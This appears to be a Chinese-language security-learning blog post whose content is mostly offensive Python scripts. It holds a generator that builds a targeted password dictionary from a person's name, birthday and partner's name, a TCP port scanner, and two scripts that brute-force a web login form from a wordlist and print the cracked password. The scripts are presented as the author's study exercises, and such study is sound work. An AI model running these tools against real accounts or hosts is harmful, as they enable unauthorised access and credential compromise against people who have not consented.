
社工密码生成

看了大量报告就知道一个短小精悍的字典有多重要。
本来想写根据键盘布局设置的密码字典的,类似

  • qwerty

  • qwer1234

  • q1w2e3r4

  • qazwsx

  • qwer!@#

  • asdf8888

  • ......
    从CSDN_TOP_5K来看,这种根据键盘布局设置的密码应该是最高频的一类密码,至少在程序猿界是这样的。

但是这种密码太灵活了,没写出来,只好写了个简单的。
只写了两种属性组合方式,生日+密码和配偶+关键词,以后再添加有用的组合。

#! /usr/bin/env python
# coding: utf-8
'''
社工字典生成
date: 2017/6/17
'''
import string

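# Accumulator shared by the combination functions below; they append
# candidates here and the main block de-duplicates it before saving.
# (A `global` declaration has no effect at module scope, so it is dropped.)
pwdList = []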

# Target profile: the attributes the generator expands and combines.
class Person:
    """Hard-coded sample profile used as input for the dictionary."""

    NAME = "han tie gun"        # space-separated, family name first
    BIRTHDAY = "1926 08 17"     # "YYYY MM DD"
    PARTNER = 'wang gang dan'
    # Sentimental number/word tokens combined with the partner's name.
    LOVE_KEYS = [
        '520', '1314', '5201314', '1314520', '2920184', 'love',
    ]
    # Separators inserted between the two halves of a candidate.
    SYMBOL = [
        '!', '@', '#', '_', '-', ',', '.', '!@#', '$%^',
    ]

# Attribute expansion
def get_name(name):
    """Expand a space-separated name into the spellings the script uses.

    Returns, in order: every part capitalized and joined, only the first
    character upper-cased, the first part, the first part capitalized,
    the remaining parts joined, the initials, and the initials upper-cased.
    """
    parts = name.split()
    # Initials are taken from a split on single spaces, so a doubled
    # space contributes an empty piece (same as the original).
    initials = ''.join(piece[:1] for piece in name.split(' '))
    return [
        string.capwords(name).replace(' ', ''),   # each part capitalized
        name.capitalize().replace(' ', ''),       # first letter only
        ''.join(parts[:1]),                       # family name
        ''.join(parts[:1]).capitalize(),          # family name, capitalized
        ''.join(parts[1:]),                       # given name
        initials,
        initials.upper(),
    ]

def get_birthday(day):
    """Expand a "YYYY MM DD" string into its date-derived variants.

    Returns, in order: the full digit string, year+month, month+day
    and year alone.
    """
    compact = day.replace(' ', '')
    return [
        compact,        # YYYYMMDD
        compact[:6],    # YYYYMM
        compact[4:],    # MMDD
        compact[:4],    # YYYY
    ]

def get_partner(partner):
    """Expand the partner's name with the same spellings as get_name."""
    return get_name(partner)

def get_lovekeys(keys):
    """Return the love-key tokens unchanged (placeholder for later expansion)."""
    return keys

def get_symbol(symbols):
    """Return the separator symbols unchanged (placeholder for later expansion)."""
    result = symbols
    return result

# Expanded attribute lists, built once at import time from the Person profile
# and consumed by the combination functions below.
nameList = get_name(Person.NAME)
birthdayList = get_birthday(Person.BIRTHDAY)
partnerList = get_partner(Person.PARTNER)
lovekeys = get_lovekeys(Person.LOVE_KEYS)
symbolList = get_symbol(Person.SYMBOL)

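# Attribute combinations
# name + birthday
def name_birthday(nameList, birthdayList, symbolList):
    """Append name/birthday candidates to the module-level pwdList.

    Adds every name and birthday spelling on its own, then for each
    (name, day) pair the two bare concatenations and, per symbol, the two
    orders with the symbol in between.  This mirrors partner_lovekey; the
    original fourth form was `day + symbol + day`, a copy-paste slip that
    never included the name.
    """
    pwdList.extend(nameList)
    pwdList.extend(birthdayList)
    for name in nameList:
        for day in birthdayList:
            # These do not depend on the symbol, so add them once per
            # pair rather than once per symbol (the main block de-duplicates
            # anyway, so the final output is unchanged).
            pwdList.append(name + day)
            pwdList.append(day + name)
            for symbol in symbolList:
                pwdList.append(name + symbol + day)
                pwdList.append(day + symbol + name)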

# partner + love-key
def partner_lovekey(partnerList, lovekeys, symbolList):
    """Append partner/love-key candidates to the module-level pwdList.

    For each (partner, key, symbol) triple adds both bare orders and both
    orders joined by the symbol, in the same sequence as before.
    """
    for partner in partnerList:
        for love in lovekeys:
            for symbol in symbolList:
                pwdList.extend((
                    partner + love,
                    love + partner,
                    partner + symbol + love,
                    love + symbol + partner,
                ))

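def savefile(pwdList, filename="result.txt"):
    """Write one candidate per line to *filename* and report the count.

    Args:
        pwdList: the candidate strings to write.
        filename: output path; defaults to result.txt in the working
            directory, as before.
    """
    # "w" rather than "w+": the file is only written, never read back.
    with open(filename, "w") as f:
        f.writelines(line + '\n' for line in pwdList)
    print("\r\n[*] Generated %d lines" % len(pwdList))
    print("[*] The results saved as %s" % filename)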
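if __name__ == '__main__':
    name_birthday(nameList, birthdayList, symbolList)
    partner_lovekey(partnerList, lovekeys, symbolList)
    # De-duplicate, then sort so the output file is reproducible run to run
    # (set iteration order is not).
    pwdList = sorted(set(pwdList))
    savefile(pwdList)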


最近又刚发现某大佬写的利器,感觉应该很好用,基本上我想要的功能都有,伏地膜-。-

python端口扫描器

学习python网络编程,写了个tcp的端口扫描,单线程,仅仅为了学习而已。

#! /usr/bin/env python
# coding:utf-8
# 端口扫描
import argparse
import socket
import time

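def scan(ip, port):
    """Attempt a TCP connect to (ip, port) and return connect_ex's result.

    Returns 0 when the connection succeeded, the errno otherwise, or None
    if the socket could not be created or connect_ex raised a socket error.
    """
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    except socket.error:
        return None
    try:
        # Set the timeout on this socket: setdefaulttimeout() only affects
        # sockets created after the call, so it never applied to this one.
        s.settimeout(3)
        return s.connect_ex((ip, port))
    except socket.error:
        return None
    finally:
        s.close()  # the original never closed the descriptor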

def scanport():
    """Probe every port from start_port to end_port on target_ip, printing the open ones.

    Reads the module-level target_ip, start_port and end_port that the
    main block sets from the command line, and prints the elapsed time.
    """
    started = time.time()
    print(u"开放的端口: ")
    for port in range(start_port, end_port + 1):
        if scan(target_ip, port) == 0:
            print("* %s --- open" % str(port))
    print(u"扫描结束,耗时: %s s." % (time.time() - started))
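if __name__ == "__main__":
    parse = argparse.ArgumentParser()
    parse.add_argument("host", action="store", help="The target host")
    # type=int makes argparse reject a non-numeric port with a usage
    # error instead of an int() traceback.
    parse.add_argument("start", action="store", type=int, help="The start port")
    parse.add_argument("end", action="store", type=int, help="The end port")
    args = parse.parse_args()

    # Module-level globals read by scanport().
    target_ip = socket.gethostbyname(args.host)
    start_port = args.start
    end_port = args.end

    scanport()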

登陆表单破解2

#! /usr/bin/env python
# coding:utf-8
'''
暴力破解登陆表单
date: 2017/3/13
参数: 脚本名 登陆地址 用户名 密码字典 登陆失败特征字符
'''
import requests, sys
# Arguments: script, login URL, username, password-list path, failure marker.
if len(sys.argv) != 5:
    print u'''
    Usage: brute.py http:127.0.0.1/login.php admin pwd.txt failed
    '''
    sys.exit()

url = sys.argv[1]
username = sys.argv[2]
pwdPtah = sys.argv[3]    # password-list path ("Ptah" is the original spelling)
identify = sys.argv[4]   # substring expected on the failed-login page

# NOTE: the file handle is never closed; only '\n' is stripped, so a
# trailing '\r' from CRLF files stays part of the password.
for password in open(pwdPtah).readlines():
    password = password.strip('\n')
    data = {
        'user': username,
        'passwd': password
    }
    headers = {
        'UserAgent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3004.3 Safari/537.36',
        'AcceptEncoding': 'gzip, deflate, sdch'
    }
    print u'正在尝试 %s:%s' % (username, password)
    res = requests.post(url, data=data, headers=headers)
    # Success is inferred from the *absence* of the failure marker, so any
    # response without it (an error page, for instance) is also reported
    # as success.
    if res.text.find(identify) == -1:
        print u'破解成功,密码为: %s' % password
        break

这次用requests库写的,感觉比Urllib2要方便和强大些

登陆表单破解

#! /usr/bin/env python
# coding:utf-8
'''
登陆表单暴力破解
Date: 2017/3/12
'''
import urllib, urllib2, time

# Request settings (hard-coded; the later requests-based version takes them
# from the command line instead).
url = 'http://127.0.0.1/login.php'
UserAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3004.3 Safari/537.36'
xff = '127.0.0.1'    # value sent in the X-Forwarded-For header
AcceptEncoding = 'gzip, deflate, sdch'

username = 'admin'
pwdPath = 'f:\\py_code\\pwd.txt'    # password list, one entry per line
identify = 'failed'    # substring expected on the failed-login page

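def getPwdList(pwdPath):
    """Load the password list at *pwdPath*, one entry per line.

    Returns the lines with their trailing newline removed (a carriage
    return is kept, as before), or None if the file could not be read;
    the error is printed rather than raised, matching the original
    best-effort behaviour.
    """
    try:
        # `with` closes the handle; the original left it open.
        with open(pwdPath) as fopen:
            pwdList = [x.strip('\n') for x in fopen.readlines()]
    except Exception as msg:
        print('字典加载错误: %s' % msg)
        return None
    print('字典加载成功,总有%s条密码' % len(pwdList))
    return pwdList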

def makeReq(url, UserAgent, xff, AcceptEncoding):
    # 构造Request请求
    req = urllib2.Request(url)
    req.add_header('User-Agent', UserAgent)
    req.add_header('X-Forwarded-For', xff)
    req.add_header('Accept-Encoding', AcceptEncoding)
    return req

def login(req, username, password, identify):
    # Submit the form once with the given credentials.
    # Returns True when the response does not contain `identify`;
    # returns None (falls through) otherwise or when the request fails,
    # in which case the error is printed.
    params = {}
    params['passwd'] = password
    params['user'] = username
    data = urllib.urlencode(params)
    # Attaching a body turns the request into a POST (urllib2 semantics).
    req.add_data(data)
    try:
        res = urllib2.urlopen(req)
        html_text = res.read()
        # print html_text
        # Success is inferred from the absence of the failure marker.
        if html_text.find(identify) == -1:
            return True
    except Exception, msg:
        print '网页打开错误: %s' % msg
        # print res.read()
        # print res.getcode()
        # print res.geturl()

pwdL = getPwdList(pwdPath)  # password list; None if loading failed, which makes the loop below raise
start_time = time.time()
for password in pwdL:
    # A fresh Request per attempt: reusing one across urlopen() calls
    # misbehaved for the author (see the note at the end of the post).
    req = makeReq(url, UserAgent, xff, AcceptEncoding)
    print '正在尝试 %s:%s' % (username, password)
    login_result = login(req=req, username=username, password=password, identify=identify)
    if login_result == True:
        spent_time = time.time() - start_time
        print '破解成功,密码为: %s ' % password
        print '耗时: %s 秒' % spent_time
        break

遇到的坑:
urllib2.Request对象生成后不要多次open,有大问题,调了一下午的大问题,不知为何,于是只能傻傻的一个open对应一个Request。很坑,调到心态爆炸,下次考虑用requests写了。